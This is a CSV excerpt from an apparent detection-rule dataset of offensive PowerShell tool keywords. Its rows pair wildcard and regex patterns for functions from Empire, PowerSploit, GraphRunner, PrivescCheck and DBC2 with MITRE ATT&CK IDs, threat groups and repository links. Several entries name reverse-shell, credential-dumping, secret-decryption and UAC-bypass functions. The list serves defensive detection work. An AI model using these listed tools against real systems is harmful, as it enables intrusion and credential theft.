"*Invoke-SauronEye.ps1*",".{0,1000}Invoke\-SauronEye\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49491"
"*Invoke-SccmCacheFolderCheck*",".{0,1000}Invoke\-SccmCacheFolderCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49492"
"*Invoke-SccmCacheFolderVulnCheck*",".{0,1000}Invoke\-SccmCacheFolderVulnCheck.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49493"
"*Invoke-ScheduledTasksCheck*",".{0,1000}Invoke\-ScheduledTasksCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49494"
"*Invoke-ScheduledTasksImagePermissionsCheck*",".{0,1000}Invoke\-ScheduledTasksImagePermissionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49495"
"*Invoke-ScheduledTasksUnquotedPathCheck*",".{0,1000}Invoke\-ScheduledTasksUnquotedPathCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49496"
"*Invoke-Schtasks*",".{0,1000}Invoke\-Schtasks.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49497"
"*Invoke-SCMPermissionsCheck*",".{0,1000}Invoke\-SCMPermissionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49498"
"*Invoke-SCOMDecrypt*",".{0,1000}Invoke\-SCOMDecrypt.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","N/A","10","2","123","22","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z","49499"
"*Invoke-ScriptSentry*",".{0,1000}Invoke\-ScriptSentry.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","49500"
"*Invoke-SCShell*",".{0,1000}Invoke\-SCShell.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49501"
"*Invoke-SDCLTBypass*",".{0,1000}Invoke\-SDCLTBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1130","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49502"
"*Invoke-SDCLTBypass.ps1*",".{0,1000}Invoke\-SDCLTBypass\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49503"
"*Invoke-SDPropagator*",".{0,1000}Invoke\-SDPropagator.{0,1000}","offensive_tool_keyword","powershell","propagation of ACL changes on the 'AdminSDHolder' container. which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. and forcing ACL changes to propagate may lead to unintended security consequences.","T1222","TA0003","N/A","N/A","Persistence","https://github.com/theyoge/AD-Pentesting-Tools/blob/main/Invoke-SDPropagator.ps1","1","1","N/A","N/A","N/A","2","128","26","2020-12-29T07:57:54Z","2020-10-14T05:01:51Z","49504"
"*Invoke-SearchGAL*",".{0,1000}Invoke\-SearchGAL.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49505"
"*Invoke-SearchMailbox*",".{0,1000}Invoke\-SearchMailbox.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Has the ability to do deep searches across a user?s mailbox and can export messages","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49506"
"*Invoke-SearchSharePointAndOneDrive*",".{0,1000}Invoke\-SearchSharePointAndOneDrive.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Search across all SharePoint sites and OneDrive drives visible to the user","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49507"
"*Invoke-SearchTeams -Tokens *",".{0,1000}Invoke\-SearchTeams\s\-Tokens\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49508"
"*Invoke-SearchUserAttributes*Search for terms across all user attributes in a directory*",".{0,1000}Invoke\-SearchUserAttributes.{0,1000}Search\sfor\sterms\sacross\sall\suser\sattributes\sin\sa\sdirectory.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49509"
"*Invoke-Seatbelt*",".{0,1000}Invoke\-Seatbelt.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49510"
"*Invoke-Seatbelt*",".{0,1000}Invoke\-Seatbelt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49511"
"*Invoke-SecretDecrypt*",".{0,1000}Invoke\-SecretDecrypt.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","1","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","49512"
"*Invoke-SecretsDump.ps1*",".{0,1000}Invoke\-SecretsDump\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49513"
"*Invoke-SecretStealer*",".{0,1000}Invoke\-SecretStealer.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","1","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","49514"
"*Invoke-SecurityGroupCloner -Tokens *",".{0,1000}Invoke\-SecurityGroupCloner\s\-Tokens\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49515"
"*Invoke-SecurityGroupCloner*",".{0,1000}Invoke\-SecurityGroupCloner.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Clones a security group while using an identical name and member list but can inject another user as well","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49516"
"*Invoke-SendMail -Targets*",".{0,1000}Invoke\-SendMail\s\-Targets.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","0","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","49517"
"*Invoke-SendReverseShell*",".{0,1000}Invoke\-SendReverseShell.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","49518"
"*Invoke-SendToPasteBin*",".{0,1000}Invoke\-SendToPasteBin.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","49519"
"*Invoke-SensitiveHiveFileAccessCheck*",".{0,1000}Invoke\-SensitiveHiveFileAccessCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49520"
"*Invoke-SensitiveHiveShadowCopyCheck*",".{0,1000}Invoke\-SensitiveHiveShadowCopyCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49521"
"*Invoke-ServiceAbuse*",".{0,1000}Invoke\-ServiceAbuse.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Exploit vulnerable service permissions (does not require touching disk)","T1550 - T1555 - T1212 - T1558","N/A","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","49522"
"*Invoke-ServiceAbuse*",".{0,1000}Invoke\-ServiceAbuse.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49523"
"*Invoke-ServiceAbuse*",".{0,1000}Invoke\-ServiceAbuse.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","49524"
"*Invoke-ServiceAbuse*",".{0,1000}Invoke\-ServiceAbuse.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","49525"
"*Invoke-ServiceAbuse*",".{0,1000}Invoke\-ServiceAbuse.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49526"
"*Invoke-ServiceCMD*",".{0,1000}Invoke\-ServiceCMD.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49527"
